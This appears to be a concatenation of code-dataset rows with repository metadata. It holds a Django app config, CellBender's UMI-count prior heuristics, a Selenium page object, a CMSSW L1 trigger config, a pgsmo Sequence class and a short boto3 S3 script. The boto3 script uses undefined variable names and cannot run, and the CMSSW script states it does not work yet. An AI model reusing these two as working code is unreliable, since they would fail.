"[email protected]"
] | |
1449e09c9233293ca4022000600e95acfe938497 | f24b229ac4ee0c0a94e48c400be4b52a7a585871 | /home/apps.py | 0a6d0b19dce6f1c25e2ae31d407f6fa52c5004ec | [] | no_license | RudreshVeerkhare/GroupChat | 462c0f9c98949d418fa10cb2aaf173c8352419ba | 39ddaaee0e5d0f36d4e44ae2b16f3a6440171259 | refs/heads/master | 2021-06-19T11:29:34.372870 | 2021-03-26T14:40:55 | 2021-03-26T14:40:55 | 193,379,367 | 28 | 6 | null | 2021-03-26T14:40:56 | 2019-06-23T17:57:19 | CSS | UTF-8 | Python | false | false | 134 | py | from django.apps import AppConfig
class HomeConfig(AppConfig):
name = "home"
def ready(self):
import home.signals
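
# The `ready()` hook above assumes a `home/signals.py` module. A minimal sketch of
# what such a module often looks like (the model and receiver below are assumptions
# for illustration, not taken from this project):
#
# from django.db.models.signals import post_save
# from django.dispatch import receiver
# from django.contrib.auth.models import User
#
# @receiver(post_save, sender=User)
# def on_user_created(sender, instance, created, **kwargs):
#     if created:
#         pass  # e.g. create related objects for the new user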
| [
"[email protected]"
] | |
132158a21c498725862cc23ae626f36d7f28db28 | 0c41f2fd4c1ad9b954097b0662e556b3eb288987 | /cellbender/remove_background/data/priors.py | 3989769165ab538647ccca8e672a97fca80bd06d | [] | permissive | broadinstitute/CellBender | e884a5520fc3e0fc2f422f8cd6dcdc6c594b5094 | 4990df713f296256577c92cab3314daeeca0f3d7 | refs/heads/master | 2023-08-21T14:55:33.619290 | 2023-08-08T18:40:14 | 2023-08-08T18:40:14 | 171,951,233 | 207 | 40 | BSD-3-Clause | 2023-08-30T05:27:18 | 2019-02-21T21:53:57 | Python | UTF-8 | Python | false | false | 15,821 | py | """Functionality for estimating various priors from the data"""
import numpy as np
import torch
from scipy.stats import gaussian_kde
from cellbender.remove_background import consts
from typing import Dict, Tuple, Union
import logging
logger = logging.getLogger('cellbender')
def _threshold_otsu(umi_counts: np.ndarray, n_bins: int = 256) -> float:
"""Return threshold value based on fast implementation of Otsu's method.
From skimage, with slight modifications:
https://github.com/scikit-image/scikit-image/blob/
a4e533ea2a1947f13b88219e5f2c5931ab092413/skimage/filters/thresholding.py#L312
Args:
umi_counts: Array of UMI counts
n_bins: Number of bins used to calculate histogram
Returns:
threshold: Upper threshold value. All droplets with UMI counts greater
than this value are assumed to contain cells.
References
----------
.. [1] Wikipedia, https://en.wikipedia.org/wiki/Otsu's_Method
.. [2] https://scikit-image.org/docs/stable/auto_examples/applications/plot_thresholding.html
Notes
-----
The input image must be grayscale.
"""
# create a UMI count histogram
counts, bin_centers = _create_histogram(umi_counts=umi_counts, n_bins=n_bins)
# class probabilities for all possible thresholds
weight1 = np.cumsum(counts)
weight2 = np.cumsum(counts[::-1])[::-1]
# class means for all possible thresholds
mean1 = np.cumsum(counts * bin_centers) / weight1
mean2 = (np.cumsum((counts * bin_centers)[::-1]) / weight2[::-1])[::-1]
# Clip ends to align class 1 and class 2 variables:
# The last value of ``weight1``/``mean1`` should pair with zero values in
# ``weight2``/``mean2``, which do not exist.
variance12 = weight1[:-1] * weight2[1:] * (mean1[:-1] - mean2[1:]) ** 2
idx = np.argmax(variance12)
threshold = bin_centers[idx]
return threshold
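
# A minimal usage sketch for the helper above (the synthetic counts are assumptions
# for illustration, not data from this module):
#
# rng = np.random.default_rng(0)
# fake_umis = np.concatenate([rng.poisson(50, 5000), rng.poisson(5000, 500)]).astype(float)
# log_cutoff = _threshold_otsu(np.log(fake_umis + 1))
# putative_cells = fake_umis > np.exp(log_cutoff)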
def _create_histogram(umi_counts: np.ndarray, n_bins: int) -> Tuple[np.ndarray, np.ndarray]:
"""Return a histogram.
Args:
umi_counts: Array of UMI counts
n_bins: Number of bins used to calculate histogram
Returns:
counts: Each element is the number of droplets falling in each UMI
count bin
bin_centers: Each element is the value corresponding to the center of
each UMI count bin
"""
counts, bin_edges = np.histogram(umi_counts.reshape(-1), n_bins)
bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2
return counts.astype('float32', copy=False), bin_centers
def _peak_density_given_cutoff(umi_counts: np.ndarray,
cutoff: float,
cell_count_low_limit: float) -> Tuple[float, float]:
"""Run scipy.stats gaussian_kde on part of the UMI curve"""
# get the UMI count values we are including
noncell_counts = umi_counts[umi_counts <= cutoff]
# resample them: the magic of looking at a log log plot
n_putative_cells = (umi_counts > cell_count_low_limit).sum()
n_putative_empties = len(noncell_counts)
inds = np.logspace(np.log10(n_putative_cells),
np.log10(n_putative_cells + n_putative_empties),
num=1000,
base=10)
inds = [max(0, min(int(ind - n_putative_cells), len(noncell_counts) - 1)) for ind in inds]
noncell_counts = np.sort(noncell_counts)[::-1][inds]
# find the peak density: that is the empty count prior
# calculate range of data, rounding out to make sure we cover everything
log_noncell_counts = np.log(noncell_counts)
x = np.arange(
np.floor(log_noncell_counts.min()) - 0.01,
np.ceil(log_noncell_counts.max()) + 0.01,
0.1
)
# fit a KDE to estimate density
k = gaussian_kde(log_noncell_counts)
density = k.evaluate(x)
# the density peak is almost surely the empty droplets
log_peak_ind = np.argmax(density)
log_peak = x[log_peak_ind]
empty_count_prior = np.exp(log_peak)
# try to go about 1 stdev up from the peak
peak_density = np.max(density)
one_std_density = 0.6 * peak_density
one_std_inds = np.where(density[log_peak_ind:] < one_std_density)[0]
if len(one_std_inds) > 0:
one_std_ind = one_std_inds[0]
else:
one_std_ind = len(density[log_peak_ind:]) - 1
empty_count_upper_limit = np.exp(x[log_peak_ind:][one_std_ind])
return empty_count_prior, empty_count_upper_limit
def get_cell_count_given_expected_cells(umi_counts: np.ndarray,
expected_cells: int) -> Dict[str, float]:
"""In the case where a prior is passed in as input, use it
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
expected_cells: Input by user
Returns:
Dict with keys ['cell_counts']
"""
order = np.argsort(umi_counts)[::-1]
cell_counts = np.exp(np.mean(np.log(umi_counts[order][:expected_cells]))).item()
return {'cell_counts': cell_counts}
def get_empty_count_given_expected_cells_and_total_droplets(
umi_counts: np.ndarray,
expected_cells: int,
total_droplets: int,
) -> Dict[str, float]:
"""In the case where a prior is passed in as input, use it
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
expected_cells: Input by user, or prior estimate
total_droplets: Input by user
Returns:
Dict with keys ['empty_counts', 'empty_count_upper_limit']
"""
order = np.argsort(umi_counts)[::-1]
starting_point = max(expected_cells, total_droplets - 500)
empty_counts = np.median(umi_counts[order]
[int(starting_point):int(total_droplets)]).item()
# need to estimate here
cell_counts = np.exp(np.mean(np.log(umi_counts[order][:expected_cells]))).item()
middle = np.sqrt(cell_counts * empty_counts)
empty_count_upper_limit = min(middle, 1.5 * empty_counts)
return {'empty_counts': empty_counts,
'empty_count_upper_limit': empty_count_upper_limit}
def get_cell_count_empty_count(umi_counts: np.ndarray,
low_count_threshold: float = 15) -> Dict[str, float]:
"""Obtain priors on cell counts and empty droplet counts from a UMI curve
using heuristics, and without applying any other prior information.
Heuristics:
0. Ignore droplets with counts below low_count_threshold
1. Use Otsu's method to threshold the log UMI count data (ignoring droplets
past 1/4 of the total droplets above low_count_threshold, as we go down
the UMI curve). This is used as a lower limit on cell counts.
It seems quite robust.
2. Use the following iterative approach, until converged:
a. Establish an upper cutoff on possible empty droplets, using the
current estimate of empty counts and our cell count prior (the
estimate is 3/4 of the geometric mean of the two).
b. Use gaussian_kde from scipy.stats to create a smooth histogram of
the log UMI counts, for droplets with counts below the cutoff.
- A trick is used to resample the droplets before creating the
histogram, so that it looks more like a log-log plot
c. Identify the peak density of the histogram as the empty count
estimate.
- Convergence happens when our estimate of empty counts stops changing.
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
low_count_threshold: Ignore droplets with counts below this value
Returns:
Dict with keys ['cell_counts', 'empty_counts']
"""
logger.debug('Beginning priors.get_cell_count_empty_count()')
reverse_sorted_umi_counts = np.sort(umi_counts)[::-1]
umi_counts_for_otsu = reverse_sorted_umi_counts[:(umi_counts > low_count_threshold).sum() // 4]
log_cell_count_low_limit = _threshold_otsu(np.log(umi_counts_for_otsu))
cell_count_low_limit = np.exp(log_cell_count_low_limit)
logger.debug(f'cell_count_low_limit is {cell_count_low_limit}')
cell_count_prior = np.mean(umi_counts[umi_counts > cell_count_low_limit])
umi_counts_for_kde = reverse_sorted_umi_counts[reverse_sorted_umi_counts > low_count_threshold]
# initial conditions for the loop
# start low, but have a failsafe (especially for simulated data)
cutoff = max(0.1 * cell_count_low_limit, umi_counts_for_kde[-100])
empty_count_prior = -100
empty_count_upper_limit = None
delta = np.inf
a = 0
# iterate to convergence, at most 5 times
while delta > 10:
logger.debug(f'cutoff = {cutoff}')
# use gaussian_kde to find the peak in the histogram
new_empty_count_prior, empty_count_upper_limit = _peak_density_given_cutoff(
umi_counts=umi_counts_for_kde,
cutoff=cutoff,
cell_count_low_limit=cell_count_low_limit,
)
logger.debug(f'new_empty_count_prior = {new_empty_count_prior}')
# 3/4 of the geometric mean is our new upper cutoff
cutoff = 0.75 * np.sqrt(cell_count_prior * new_empty_count_prior)
delta = np.abs(new_empty_count_prior - empty_count_prior)
logger.debug(f'delta = {delta}')
empty_count_prior = new_empty_count_prior
a += 1
if a >= 5:
logger.debug('Heuristics for determining empty counts exceeded 5 '
'iterations without converging')
break
# do a final estimation of cell counts:
# go to the halfway point and then take the median of the droplets above
count_crossover = np.sqrt(cell_count_prior * empty_count_prior)
cell_count_prior = np.median(umi_counts[umi_counts > count_crossover])
logger.debug(f'cell_count_prior is {cell_count_prior}')
logger.debug(f'empty_count_prior is {empty_count_prior}')
logger.debug('End of priors.get_cell_count_empty_count()')
return {'cell_counts': cell_count_prior,
'empty_counts': empty_count_prior,
'empty_count_upper_limit': empty_count_upper_limit}
def get_expected_cells_and_total_droplets(umi_counts: np.ndarray,
cell_counts: float,
empty_counts: float,
empty_count_upper_limit: float,
max_empties: int = consts.MAX_EMPTIES_TO_INCLUDE) \
-> Dict[str, int]:
"""Obtain priors on cell counts and empty droplet counts from a UMI curve
using heuristics, and without applying any other prior information.
NOTE: to be run using inputs from get_cell_count_empty_count()
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
cell_counts: Prior from get_cell_count_empty_count()
empty_counts: Prior from get_cell_count_empty_count()
empty_count_upper_limit: Prior from get_cell_count_empty_count()
max_empties: Do not include more putative empty droplets than this
Returns:
Dict with keys ['expected_cells', 'total_droplets', 'transition_point']
Example:
>>> priors = get_cell_count_empty_count(umi_counts)
>>> priors.update(get_expected_cells_and_total_droplets(umi_counts, **priors))
"""
# expected cells does well when you give it a very conservative estimate
expected_cells = (umi_counts >= cell_counts).sum()
# total droplets will be between empty_count_prior and its upper limit
total_droplets_count_value = np.sqrt(empty_counts * empty_count_upper_limit)
total_droplets = (umi_counts >= total_droplets_count_value).sum()
# find the transition point
count_crossover = np.sqrt(cell_counts * empty_counts)
transition_point = (umi_counts >= count_crossover).sum()
logger.debug(f'In get_expected_cells_and_total_droplets(), found transition '
f'point at droplet {transition_point}')
# ensure out heuristics don't go too far out datasets with many cells
total_droplets = min(total_droplets, transition_point + max_empties)
return {'expected_cells': expected_cells,
'total_droplets': total_droplets,
'transition_point': transition_point}
def get_priors(umi_counts: np.ndarray,
low_count_threshold: float,
max_total_droplets: int = consts.MAX_TOTAL_DROPLETS_GUESSED) \
-> Dict[str, Union[int, float]]:
"""Get all priors using get_cell_count_empty_count() and
get_expected_cells_and_total_droplets(), employing a failsafe if
total_droplets is improbably large.
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
low_count_threshold: Ignore droplets with counts below this value
max_total_droplets: If the initial heuristics come up with a
total_droplets value greater than this, we re-run the heuristics
with higher low_count_threshold
Returns:
Dict with keys ['cell_counts', 'empty_counts',
'empty_count_upper_limit', 'surely_empty_counts',
'expected_cells', 'total_droplets', 'log_counts_crossover']
"""
logger.debug("Computing priors from the UMI curve")
priors = get_cell_count_empty_count(
umi_counts=umi_counts,
low_count_threshold=low_count_threshold,
)
priors.update(get_expected_cells_and_total_droplets(umi_counts=umi_counts, **priors))
logger.debug(f'Automatically computed priors: {priors}')
a = 0
while priors['total_droplets'] > max_total_droplets:
logger.debug(f'Heuristics for estimating priors resulted in '
f'{priors["total_droplets"]} total_droplets, which is '
f'typically too large. Recomputing with '
f'low_count_threshold = {priors["empty_count_upper_limit"]:.0f}')
priors = get_cell_count_empty_count(
umi_counts=umi_counts,
low_count_threshold=priors['empty_count_upper_limit'],
)
priors.update(get_expected_cells_and_total_droplets(umi_counts=umi_counts, **priors))
logger.debug(f'Automatically computed priors: {priors}')
a += 1
if a > 5:
break
# compute a few last things
compute_crossover_surely_empty_and_stds(umi_counts=umi_counts, priors=priors)
return priors
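
# Illustrative call (sketch; `umi_counts` is assumed to be an array of per-droplet
# UMI totals, e.g. matrix.sum(axis=1) from a raw count matrix):
#
# priors = get_priors(umi_counts, low_count_threshold=15)
# n_cells, n_droplets = priors['expected_cells'], priors['total_droplets']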
def compute_crossover_surely_empty_and_stds(umi_counts, priors):
"""Given cell_counts and total_droplets, compute a few more quantities
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
priors: Dict of priors
Returns:
None. Modifies priors dict in place.
"""
assert 'total_droplets' in priors.keys(), \
'Need total_droplets in priors to run compute_crossover_surely_empty_and_stds()'
assert 'cell_counts' in priors.keys(), \
'Need cell_counts in priors to run compute_crossover_surely_empty_and_stds()'
# Compute a crossover point in log count space.
reverse_sorted_counts = np.sort(umi_counts)[::-1]
surely_empty_counts = reverse_sorted_counts[priors['total_droplets']]
log_counts_crossover = (np.log(surely_empty_counts) + np.log(priors['cell_counts'])) / 2
priors.update({'log_counts_crossover': log_counts_crossover,
'surely_empty_counts': surely_empty_counts})
# Compute several other priors.
log_nonzero_umi_counts = np.log(umi_counts[umi_counts > 0])
d_std = np.std(log_nonzero_umi_counts[log_nonzero_umi_counts > log_counts_crossover]).item() / 5.
d_empty_std = 0.01 # this is basically turned off in favor of epsilon
priors.update({'d_std': d_std, 'd_empty_std': d_empty_std})
| [
"[email protected]"
] | |
dafd10119274e9bc8f0ee8f596204f2095fbc05a | f823db6961fd815b10a8828188d7b2ab58a1f699 | /testchild.py | e8b0c714f9ca3ceb6f4cb88343760c6f8f210842 | [] | no_license | mariosebastian-bit/testrepo | 26f9262c52b96ac93f2fd41cee3f137353b45b84 | 22eea3f0b58e5e9ceb44d1d0729ab3ae39ef9d1e | refs/heads/main | 2023-03-03T15:29:43.840495 | 2021-02-08T09:21:27 | 2021-02-08T09:21:27 | 336,845,049 | 0 | 0 | null | 2021-02-08T09:21:28 | 2021-02-07T17:22:07 | null | UTF-8 | Python | false | false | 44 | py | ## TESTCHILD
print ("inside the testchild")
| [
"[email protected]"
] | |
84fbbae6519e6ef37d423e06fad72516f396cfc5 | 38902540746c70149ffdfe8e8dc11be0afa14e27 | /Homework2/code/ui/pages/segments_page.py | 66541a94e77ca1c249dfb03929ec816a1c5a928f | [] | no_license | bubenchikus/2021-1-MAILRU-SDET-Python-V-Tarasenko | a214835bf20c2b28a86450e3809d24350703d48d | 9053f430010fcdc221b815028ad79c8a743117db | refs/heads/main | 2023-05-12T06:54:09.209535 | 2021-06-01T00:25:52 | 2021-06-01T00:25:52 | 351,537,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from ui.pages.base_page import BasePage
from ui.locators.page_locators import SegmentsPageLocators
class SegmentsPage(BasePage):
locators = SegmentsPageLocators()
def go_to_create_new_segment(self):
self.driver.get('https://target.my.com/segments/segments_list/new/')
def create_segment(self, segment_name):
self.go_to_create_new_segment()
self.click(self.locators.SEGMENTS_CREATE_APPS_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_GAMERS_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_GAMERS_CHOOSE_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_ADD_LOCATOR)
self.fill_field(self.locators.SEGMENTS_CREATE_NAME_LOCATOR, segment_name)
self.click(self.locators.SEGMENTS_CREATE_SUBMIT_LOCATOR)
self.find(self.locators.SEGMENTS_SEARCH_LOCATOR) # wait segments list page content to load
def delete_segments(self):
self.find(self.locators.SEGMENTS_TABLE_FRAGMENT_LOCATOR)
self.click(self.locators.SEGMENTS_CHOOSE_ALL_LOCATOR)
self.click(self.locators.SEGMENTS_ACTION_LOCATOR)
self.click(self.locators.SEGMENTS_DELETE_LOCATOR)
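
# A hypothetical usage sketch (the fixture and constructor details below are
# assumptions, not part of this page object):
#
# def test_create_and_delete_segment(driver):
#     page = SegmentsPage(driver)
#     page.create_segment('smoke-test-segment')
#     page.delete_segments()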
| [
"[email protected]"
] | |
08842649a48eb36c8cf0554d9be65a5eb137f4a6 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /CondTools/L1Trigger/test/L1ConfigWriteRSOnline_cfg.py | 64fa0d8ce4623c21378f8483b5e825899465cb4e | [] | permissive | amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | 2021-01-19T16:18:22.857382 | 2016-08-09T16:40:50 | 2016-08-09T16:40:50 | 262,608,661 | 0 | 0 | Apache-2.0 | 2020-05-09T16:10:07 | 2020-05-09T16:10:07 | null | UTF-8 | Python | false | false | 8,202 | py | # This script doesn't work yet. PoolDBESSource does not see the IOV updates made earlier in the
# same event.
import FWCore.ParameterSet.Config as cms
process = cms.Process("L1ConfigWriteRSOnline")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cout.placeholder = cms.untracked.bool(False)
process.MessageLogger.cout.threshold = cms.untracked.string('DEBUG')
process.MessageLogger.debugModules = cms.untracked.vstring('*')
import FWCore.ParameterSet.VarParsing as VarParsing
options = VarParsing.VarParsing()
options.register('runNumber',
0, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Run number")
options.register('outputDBConnect',
'sqlite_file:l1config.db', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Connection string for output DB")
options.register('outputDBAuth',
'.', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Authentication path for outputDB")
options.register('keysFromDB',
1, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"1 = read keys from OMDS, 0 = read keys from command line")
options.register('overwriteKeys',
0, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Overwrite existing keys")
options.register('logTransactions',
1, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Record transactions in log DB")
# arguments for setting object keys by hand
options.register('L1MuDTTFMasksRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1MuGMTChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1RCTChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GctChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtPrescaleFactorsAlgoTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtPrescaleFactorsTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskAlgoTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskVetoTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.parseArguments()
# Define CondDB tags
from CondTools.L1Trigger.L1CondEnum_cfi import L1CondEnum
from CondTools.L1Trigger.L1O2OTags_cfi import initL1O2OTags
initL1O2OTags()
if options.keysFromDB == 1:
process.load("CondTools.L1Trigger.L1ConfigRSKeys_cff")
else:
process.load("CondTools.L1Trigger.L1TriggerKeyDummy_cff")
from CondTools.L1Trigger.L1RSSubsystemParams_cfi import initL1RSSubsystems
initL1RSSubsystems( tagBaseVec = initL1O2OTags.tagBaseVec,
L1MuDTTFMasksRcdKey = options.L1MuDTTFMasksRcdKey,
L1MuGMTChannelMaskRcdKey = options.L1MuGMTChannelMaskRcdKey,
L1RCTChannelMaskRcdKey = options.L1RCTChannelMaskRcdKey,
L1GctChannelMaskRcdKey = options.L1GctChannelMaskRcdKey,
L1GtPrescaleFactorsAlgoTrigRcdKey = options.L1GtPrescaleFactorsAlgoTrigRcdKey,
L1GtPrescaleFactorsTechTrigRcdKey = options.L1GtPrescaleFactorsTechTrigRcdKey,
L1GtTriggerMaskAlgoTrigRcdKey = options.L1GtTriggerMaskAlgoTrigRcdKey,
L1GtTriggerMaskTechTrigRcdKey = options.L1GtTriggerMaskTechTrigRcdKey,
L1GtTriggerMaskVetoTechTrigRcdKey = options.L1GtTriggerMaskVetoTechTrigRcdKey,
includeL1RCTNoisyChannelMask = False )
process.L1TriggerKeyDummy.objectKeys = initL1RSSubsystems.params.recordInfo
# Get L1TriggerKeyList from DB
process.load("CondCore.DBCommon.CondDBCommon_cfi")
process.outputDB = cms.ESSource("PoolDBESSource",
process.CondDBCommon,
toGet = cms.VPSet(cms.PSet(
record = cms.string('L1TriggerKeyListRcd'),
tag = cms.string('L1TriggerKeyList_' + initL1O2OTags.tagBaseVec[ L1CondEnum.L1TriggerKeyList ] )
)),
RefreshEachRun=cms.untracked.bool(True)
)
process.outputDB.connect = options.outputDBConnect
process.outputDB.DBParameters.authenticationPath = options.outputDBAuth
# Generate configuration data
process.load("CondTools.L1Trigger.L1ConfigRSPayloads_cff")
# writer modules
from CondTools.L1Trigger.L1CondDBPayloadWriter_cff import initPayloadWriter
initPayloadWriter( process,
outputDBConnect = options.outputDBConnect,
outputDBAuth = options.outputDBAuth,
tagBaseVec = initL1O2OTags.tagBaseVec )
process.L1CondDBPayloadWriter.writeL1TriggerKey = cms.bool(False)
if options.logTransactions == 1:
# initPayloadWriter.outputDB.logconnect = cms.untracked.string('oracle://cms_orcon_prod/CMS_COND_31X_POPCONLOG')
initPayloadWriter.outputDB.logconnect = cms.untracked.string('sqlite_file:l1o2o-log.db')
process.L1CondDBPayloadWriter.logTransactions = True
if options.overwriteKeys == 0:
process.L1CondDBPayloadWriter.overwriteKeys = False
else:
process.L1CondDBPayloadWriter.overwriteKeys = True
from CondTools.L1Trigger.L1CondDBIOVWriter_cff import initIOVWriter
initIOVWriter( process,
outputDBConnect = options.outputDBConnect,
outputDBAuth = options.outputDBAuth,
tagBaseVec = initL1O2OTags.tagBaseVec,
tscKey = '' )
process.L1CondDBIOVWriter.logKeys = True
if options.logTransactions == 1:
# initIOVWriter.outputDB.logconnect = cms.untracked.string('oracle://cms_orcon_prod/CMS_COND_31X_POPCONLOG')
initIOVWriter.outputDB.logconnect = cms.untracked.string('sqlite_file:l1o2o-log.db')
process.L1CondDBIOVWriter.logTransactions = True
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptyIOVSource",
timetype = cms.string('runnumber'),
firstValue = cms.uint64(options.runNumber),
lastValue = cms.uint64(options.runNumber),
interval = cms.uint64(1)
)
# CORAL debugging
#process.outputDB.DBParameters.messageLevel = cms.untracked.int32(3)
process.p = cms.Path(process.L1CondDBPayloadWriter*process.L1CondDBIOVWriter)
| [
"[email protected]"
] | |
44097da54a0bb03ac14196712111a1489a956689 | 172d8623d20d374bee782c3eb08a5e2b5382f412 | /python/s3_boto3.py | 22a5c98b6f60bb3b7dd4c85ed335cfc1011560b7 | [] | no_license | Abhishek24094/dev | 8124702e3e7da04eb626bd88cbfcc1a0645a8cae | 17d6bbc1bc371e60a69f646340e2d851a8a94899 | refs/heads/master | 2021-06-30T15:56:35.505092 | 2020-09-25T08:10:52 | 2020-09-25T08:10:52 | 162,133,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #proper clarification for requirement is required
import boto3
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
| [
"[email protected]"
] | |
6e5bfeee02160589220079caf6d6e3e3b76ab585 | 629090051b975b5814b4b48e2cb2c784fa6705e4 | /pgsmo/objects/sequence/sequence.py | 58b4198fa17dee038f943fed6dd518f8db8054e6 | [
"MIT"
] | permissive | microsoft/pgtoolsservice | 3d3597821c7cae1d216436d4f8143929e2c8a82a | 24a048226f7f30c775bbcbab462d499a465be5da | refs/heads/master | 2023-08-28T12:55:47.817628 | 2023-08-25T22:47:53 | 2023-08-25T22:47:53 | 80,681,087 | 68 | 35 | NOASSERTION | 2023-09-13T21:46:55 | 2017-02-02T01:00:33 | Python | UTF-8 | Python | false | false | 6,637 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from typing import Optional, List, Dict
from smo.common.node_object import NodeObject, NodeLazyPropertyCollection, NodeCollection
from smo.common.scripting_mixins import ScriptableCreate, ScriptableDelete, ScriptableUpdate
from pgsmo.objects.server import server as s # noqa
import smo.utils.templating as templating
class Sequence(NodeObject, ScriptableCreate, ScriptableDelete, ScriptableUpdate):
TEMPLATE_ROOT = templating.get_template_root(__file__, 'templates')
MACRO_ROOT = templating.get_template_root(__file__, 'macros')
GLOBAL_MACRO_ROOT = templating.get_template_root(__file__, '../global_macros')
@classmethod
def _from_node_query(cls, server: 's.Server', parent: NodeObject, **kwargs) -> 'Sequence':
"""
Creates a Sequence object from the result of a sequence node query
:param server: Server that owns the sequence
:param parent: Parent object of the sequence
:param kwargs: Row from a sequence node query
Kwargs:
oid int: Object ID of the sequence
name str: Name of the sequence
:return: A Sequence instance
"""
seq = cls(server, parent, kwargs['name'])
seq._oid = kwargs['oid']
seq._schema = kwargs['schema']
seq._scid = kwargs['schemaoid']
seq._is_system = kwargs['is_system']
return seq
def __init__(self, server: 's.Server', parent: NodeObject, name: str):
self._server = server
self._parent: Optional['NodeObject'] = parent
self._name: str = name
self._oid: Optional[int] = None
self._is_system: bool = False
self._child_collections: Dict[str, NodeCollection] = {}
self._property_collections: List[NodeLazyPropertyCollection] = []
# Use _column_property_generator instead of _property_generator
self._full_properties: NodeLazyPropertyCollection = self._register_property_collection(self._sequence_property_generator)
ScriptableCreate.__init__(self, self._template_root(server), self._macro_root(), server.version)
ScriptableDelete.__init__(self, self._template_root(server), self._macro_root(), server.version)
ScriptableUpdate.__init__(self, self._template_root(server), self._macro_root(), server.version)
self._schema: str = None
self._scid: int = None
self._def: dict = None
def _sequence_property_generator(self):
template_root = self._template_root(self._server)
# Setup the parameters for the query
template_vars = self.template_vars
# Render and execute the template
sql = templating.render_template(
templating.get_template_path(template_root, 'properties.sql', self._server.version),
self._macro_root(),
**template_vars
)
cols, rows = self._server.connection.execute_dict(sql)
if len(rows) > 0:
return rows[0]
# PROPERTIES ###########################################################
@property
def schema(self):
return self._schema
@property
def scid(self):
return self._scid
# -FULL OBJECT PROPERTIES ##############################################
@property
def cycled(self):
return self._full_properties.get("cycled", "")
@property
def increment(self):
return self._full_properties.get("increment", "")
@property
def start(self):
return self._full_properties.get("start", "")
@property
def current_value(self):
return self._full_properties.get("current_value", "")
@property
def minimum(self):
return self._full_properties.get("minimum", "")
@property
def maximum(self):
return self._full_properties.get("maximum", "")
@property
def cache(self):
return self._full_properties.get("cache", "")
@property
def cascade(self):
return self._full_properties.get("cascade", "")
@property
def seqowner(self):
return self._full_properties.get("seqowner", "")
@property
def comment(self):
return self._full_properties.get("comment", "")
# IMPLEMENTATION DETAILS ###############################################
@classmethod
def _macro_root(cls) -> List[str]:
return [cls.MACRO_ROOT, cls.GLOBAL_MACRO_ROOT]
@classmethod
def _template_root(cls, server: 's.Server') -> str:
return cls.TEMPLATE_ROOT
# HELPER METHODS ##################################################################
def _create_query_data(self):
""" Gives the data object for create query """
return {"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
}}
def _update_query_data(self):
""" Gives the data object for update query """
return {
"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
},
"o_data": {
"schema": self.schema,
"name": self.name,
"seqowner": self.seqowner,
"comment": self.comment
}
}
def _delete_query_data(self):
""" Gives the data object for update query """
return {
"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
},
"cascade": self.cascade
}
| [
"[email protected]"
] | |
